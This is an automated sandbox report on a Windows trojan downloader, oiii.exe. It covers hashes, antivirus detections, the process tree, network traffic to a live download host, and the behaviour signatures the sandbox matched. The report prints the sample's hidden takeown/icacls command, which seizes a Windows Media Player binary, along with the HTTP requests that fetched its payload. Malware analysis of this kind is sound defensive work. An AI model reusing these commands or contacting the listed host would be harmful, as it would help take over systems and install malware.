Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 21, 2024, 7:20 a.m.	May 21, 2024, 7:22 a.m.

Size	326.0KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`a59664f37c25edaa69c39a65490ed3a9`
SHA256	`3b50fe74f6b83d53efab2ee7e197026977dac17fdd3302c7df454fac19abb12d`
CRC32	`94647184`
ssdeep	`6144:Rj8KWXflIwycVYUcBrcisb765kohreOCSYA/U:+Kkfl3x0BrcdEkoWCc`
PDB Path	c:\Users\Administrator\Jenkins\workspace\ccx-libraries-windows\build\Release\CCLibrary.pdb
Yara	IsPE64 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

oiii.exe "C:\Users\test22\AppData\Local\Temp\oiii.exe"
2556
- cmd.exe "C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
  3024
  - takeown.exe takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"
    1120

Name	Response	Post-Analysis Lookup
sta.alie3ksgee.com	A 103.146.158.221	103.146.158.221

IP Address	Status	Action
103.146.158.221	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 103.146.158.221:80 -> 192.168.56.101:49590	2014819	ET INFO Packed Executable Download	Misc activity
TCP 103.146.158.221:80 -> 192.168.56.101:49590	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 21, 2024, 7:21 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 21, 2024, 7:21 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1	0
WriteConsoleW May 21, 2024, 7:21 a.m.	buffer: The system cannot find the path specified. console_handle: 0x000000000000000b	1	1	0

This executable has a PDB path (1 event)

pdb_path

c:\Users\Administrator\Jenkins\workspace\ccx-libraries-windows\build\Release\CCLibrary.pdb

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

MUI

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 21, 2024, 7:14 a.m.	stacktrace: 0x24f1a6c 0x1dc41 exception.instruction_r: 0f 10 00 0f 11 01 0f 10 48 10 0f 11 49 10 0f 10 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x24f1a6c registers.r14: 0 registers.r15: 0 registers.rcx: 139618424129194 registers.rsi: 0 registers.r10: 0 registers.rbx: 2085472 registers.rsp: 53933888 registers.r11: 514 registers.r8: 53932456 registers.r9: 53932512 registers.rdx: 8796092674640 registers.r12: 0 registers.rbp: 0 registers.rdi: 122531 registers.rax: 139619058161612 registers.r13: 0	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET http://sta.alie3ksgee.com/xxxxxxxx.jpg
request	GET http://sta.alie3ksgee.com/aaaaaaaa.jpg
request	GET http://sta.alie3ksgee.com/123.456

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 21, 2024, 7:13 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013fb5a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 21, 2024, 7:13 a.m.	process_identifier: 2556 region_size: 380928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 21, 2024, 7:13 a.m.	process_identifier: 2556 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000024f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (50 out of 69 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324345344 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324320768 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324312576 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324288000 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324288000 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324251136 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324242944 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324169216 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324177408 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324144640 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324120064 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324079104 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324062720 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324029952 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324021760 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13324005376 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323988992 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323972608 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323931648 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323907072 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323907072 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323882496 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323874304 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323849728 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323825152 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323792384 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323792384 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323677696 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323702272 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323677696 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323612160 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:13 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323603968 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323587584 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323563008 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323546624 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323530240 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323505664 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323489280 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323464704 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323464704 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323440128 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323431936 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323399168 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323382784 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323374592 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323350016 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323284480 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323292672 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323259904 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 21, 2024, 7:14 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13323235328 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1

Creates executable files on the filesystem (1 event)

file	C:\Program Files\Windows Media Player\mpsvc.dll

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
cmdline	cmd.exe cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 21, 2024, 7:14 a.m.	show_type: 0 filepath_r: cmd.exe parameters: cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F filepath: cmd.exe	1	1	0

An executable file was downloaded by the process oiii.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv May 21, 2024, 7:14 a.m.	buffer: HTTP/1.1 200 OK Server: nginx Date: Mon, 20 May 2024 22:21:40 GMT Content-Type: application/octet-stream Content-Length: 129536 Last-Modified: Sun, 19 May 2024 13:35:04 GMT Connection: keep-alive ETag: "664a0008-1fa00" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $î÷.ª@Êª@Êª@ÊáîCË¯@ÊáîEË9@ÊáîDË @Êª@Ê«@ÊhEË@ÊhDË¤@ÊhCË»@ÊáîAË¯@ÊªAÊÉ@ÊXIË«@ÊX@Ë«@ÊX¿Ê«@ÊXBË«@ÊRichª@ÊPEdJfð" '(â``0ÕPÕ<@øP\à¹p ¸@@°.text(( `.rdata\|@ ,@@.data!àÌ@À.pdataÚ@@_RDATAô0î@@.rsrcø@ð@@.relo received: 1024 socket: 748	1	1024	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 21, 2024, 7:21 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1	0

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Elastic	malicious (high confidence)
Skyhigh	BehavesLike.Win64.Dropper.fh
ESET-NOD32	a variant of Win64/TrojanDownloader.Agent.APQ
McAfee	Artemis!A59664F37C25
Kaspersky	UDS:Trojan-Downloader.Win32.Agent
Rising	Trojan.Agent!1.F474 (CLASSIC)
McAfeeD	ti!3B50FE74F6B8
Sophos	Mal/Generic-S
Kingsoft	Win32.PSWTroj.Undef.a
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	UDS:Trojan-Downloader.Win32.Agent
AhnLab-V3	Malware/Win.Generic.C5578776
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Downloader
Tencent	Win64.Trojan-Downloader.Oader.Ogil
alibabacloud	Trojan[downloader]:Win/Agent.AXV

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 347 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[10].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[3].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\cropImg_196x196_38699317823237099[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\e84a7e15-e6a9-41ec-9eb7-883e9b5e7249[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[9].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\8c9b6e5b-4abb-45c6-9aa7-aa28806e8e84[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\adf7905c-28ea-4ddf-93b2-aa96dad57752[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\img_ie@2x[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCAR5WT7S.jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumbCADBM4RE.jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f1e83251-9248-4d4e-8d2e-d1505a55bc83[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\httpErrorPagesScripts[1]
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\img_qrcode_help_desc_3[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\ico_jmail2_120309[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\img_qrcode_help_desc_4[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[2].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumb[2].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\477[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\1_237[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\d221948a-1151-457a-9c16-d1e733997523[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\2931dd60-1842-4048-a39c-1e3389db4a0e[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumb[7].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\getLoginStatus[2].nhn
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\812[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\8dbf7458-f07f-40d8-bb78-3999d1717cc6[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\956[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\e1c52a50-7652-4730-93fb-7e34c253df11[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[6].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\cropImg_196x196_77688907167327728[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\getProfile[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\sample-doc-download[1].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\9b2f0eb0-da4f-420c-b9e9-5dacb3614c8c[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[2].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\ae64eb0f-de7e-406d-8fcd-3f372b45239a[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\404[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\docbrows[1]
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\cropImg_728x360_38627488619452210[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\TestWordDoc[1].doc
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\950[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\42a1fd5c-afd1-4407-bbaa-2fbabdf7edd3[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\cropImg_728x360_38481254551659019[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\ipsec[1].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[8].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCA1UETMM.jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\nsd102538785[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\dthumbCADCSOI7.jpg

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
cmdline	cmd.exe cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F

oiii.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All